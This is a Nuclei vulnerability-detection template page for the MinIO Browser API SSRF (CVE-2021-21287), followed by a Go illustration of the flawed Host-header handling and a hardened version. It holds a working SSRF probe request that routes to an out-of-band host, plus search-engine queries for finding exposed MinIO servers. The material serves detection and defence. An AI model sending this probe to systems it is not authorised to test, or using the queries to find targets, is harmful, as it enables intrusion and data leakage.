MinIO Browser API - Server-Side Request Forgery
ID: CVE-2021-21287
Severity: high
Author: pikpikcu
Tags: cve,cve2021,minio,ssrf,oast
Description
MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
YAML Source
id: CVE-2021-21287

info:
  name: MinIO Browser API - Server-Side Request Forgery
  author: pikpikcu
  severity: high
  description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Apply the latest security patches or updates provided by MinIO to fix this vulnerability.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
    - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
    - https://github.com/minio/minio/pull/11337
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21287
    - https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2021-21287
    cwe-id: CWE-918
    epss-score: 0.97268
    epss-percentile: 0.99855
    cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: minio
    product: minio
    shodan-query:
      - http.title:"minio browser"
      - cpe:"cpe:2.3:a:minio:minio"
      - http.title:"minio console"
    fofa-query:
      - title="minio console"
      - app="minio"
      - title="minio browser"
    google-query:
      - intitle:"minio browser"
      - intitle:"minio console"
  tags: cve,cve2021,minio,ssrf,oast

http:
  - raw:
      - |
        POST /minio/webrpc HTTP/1.1
        Host: {{interactsh-url}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
        Content-Length: 76

        {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http" # Confirms the HTTP Interaction

      - type: word
        words:
          - "We encountered an internal error"
# digest: 4b0a00483046022100a557663d2794186c3c062e3fc10c7907a686bee305cde91b4d5a0be403ca07b9022100c40e1de2535dc385e5906ef86b5b61348ae20028884324698aa5c9ccb901f7e4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect the vulnerability in web applications. It runs with the Nuclei tool, which sends the request above and applies the matchers to confirm the behavior:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21287.yaml"
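The template above works because the Browser API builds a server-side request from the client-controlled Host header (hence Host: {{interactsh-url}} and the interactsh matcher). The following Go code is an added, hypothetical illustration of that CWE-918 pattern and a hardened form, not MinIO's own code; the function names, the configured address and the request are constructed for the example.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"strings"
)

// vulnerableSTSEndpoint shows the CWE-918 shape the template probes: the
// destination of the server's own outbound STS request is taken from the
// client-controlled Host header (the template sets it to {{interactsh-url}}).
func vulnerableSTSEndpoint(r *http.Request) string {
	return "http://" + r.Host + "/"
}

// hardenedSTSEndpoint never routes on the Host header: the outbound URL is
// built from the configured address, and a request whose Host header does
// not name that server is rejected instead of being forwarded anywhere.
func hardenedSTSEndpoint(r *http.Request, configuredAddr string) (string, error) {
	if !hostMatches(r.Host, configuredAddr) {
		return "", errors.New("host header does not match the configured server address")
	}
	return "http://" + configuredAddr + "/", nil
}

// hostMatches compares hostnames case-insensitively; a port given in the
// header must equal the configured port, while a missing port is accepted.
func hostMatches(header, configured string) bool {
	hh, hp, err := net.SplitHostPort(header)
	if err != nil {
		hh, hp = header, ""
	}
	ch, cp, err := net.SplitHostPort(configured)
	if err != nil {
		ch, cp = configured, ""
	}
	return hh != "" && strings.EqualFold(hh, ch) && (hp == "" || hp == cp)
}

func main() {
	// Constructed request shaped like the template's probe (no network I/O).
	r, _ := http.NewRequest("POST", "/minio/webrpc", nil)
	r.Host = "attacker.oast.example" // stands in for {{interactsh-url}}
	fmt.Println("vulnerable would connect to:", vulnerableSTSEndpoint(r))
	if _, err := hardenedSTSEndpoint(r, "minio.internal:9000"); err != nil {
		fmt.Println("hardened rejects the request:", err)
	}
}
```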